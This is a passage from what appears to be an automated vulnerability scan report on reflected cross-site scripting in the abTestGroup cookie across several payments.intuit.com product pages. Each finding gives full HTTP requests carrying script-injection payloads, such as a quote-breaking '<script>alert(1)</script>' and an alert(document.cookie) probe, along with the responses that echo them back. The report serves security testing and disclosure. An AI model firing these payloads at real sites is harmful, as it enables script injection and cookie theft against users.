Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16237a8"><script>alert(1)</script>3c9a92fa8e4;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:19 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=5mwmxN-YSeEUWnoCbHA8dw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:20 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95EEADD0A0805192AA117E3455FA2C5
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dcredit_002dcard_002dprocessing_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140402


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<input id="testGroup" value="T16237a8"><script>alert(1)</script>3c9a92fa8e4" type="hidden" />
...[SNIP]...

1.106. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/credit-card-processing-services.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 72ea0<script>alert(1)</script>71ad3f15145 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/credit-card-processing-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1672ea0<script>alert(1)</script>71ad3f15145;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:20 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=0gJsq4xKWOU5zI3BdZ9jRQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:21 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960C1040A0805192AA117E3D2A016E8
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dcredit_002dcard_002dprocessing_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140388


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<br />
       A/B Test Group: T1672ea0<script>alert(1)</script>71ad3f15145<br />
...[SNIP]...

1.107. http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/custom-gift-card-program.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload e45dc<script>alert(1)</script>7c80ec2b9be was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/custom-gift-card-program.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16e45dc<script>alert(1)</script>7c80ec2b9be;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:00 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=NM1cXKOSTgpWuZZ0jneybw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:01 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960766B0A0805192AA117E3B896B94C
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=custom_002dgift_002dcard_002dprogram_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 133369


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<br />
       A/B Test Group: T16e45dc<script>alert(1)</script>7c80ec2b9be<br />
...[SNIP]...

1.108. http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/custom-gift-card-program.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21ddf"><script>alert(1)</script>911cfbd5c1d was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/custom-gift-card-program.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1621ddf"><script>alert(1)</script>911cfbd5c1d;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:11 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=f4soDtGYnfBpe017ileG8g**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:12 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95ECC960A0805192AA117E3449F5EA1
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=custom_002dgift_002dcard_002dprogram_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 133382

...[SNIP]...
<input id="testGroup" value="T1621ddf"><script>alert(1)</script>911cfbd5c1d" type="hidden" />
...[SNIP]...

1.109. http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/online-credit-card-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 50dd2<script>alert(1)</script>22b5eb89f33 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1650dd2<script>alert(1)</script>22b5eb89f33;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:34 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=ViaN1JLvyhJWw4q1FY+pbQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:35 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960F7BF0A0805192AA117E309026F6B
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116178

...[SNIP]...
<br />
       A/B Test Group: T1650dd2<script>alert(1)</script>22b5eb89f33<br />
...[SNIP]...

1.110. http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/online-credit-card-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd521"><script>alert(1)</script>a06b40a6939 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16bd521"><script>alert(1)</script>a06b40a6939;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:43 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=gnsGbWiUDyBE9UrkkOZqgQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:44 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F49A80A0805192AA117E32E9263C0
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116193

...[SNIP]...
<input id="testGroup" value="T16bd521"><script>alert(1)</script>a06b40a6939" type="hidden" />
...[SNIP]...

1.111. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be8b6"><script>alert(1)</script>db141cf2372 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16be8b6"><script>alert(1)</script>db141cf2372;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:03 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=RUmeJMQW2zeQXOeH5zndeA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:05 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95EAE770A0805192AA117E34C30FA1D
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=point_002dof_002dsale_002dsolutions_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 150366

...[SNIP]...
<input id="testGroup" value="T16be8b6"><script>alert(1)</script>db141cf2372" type="hidden" />
...[SNIP]...

1.112. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload ccada<script>alert(1)</script>03b0d3d035e was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
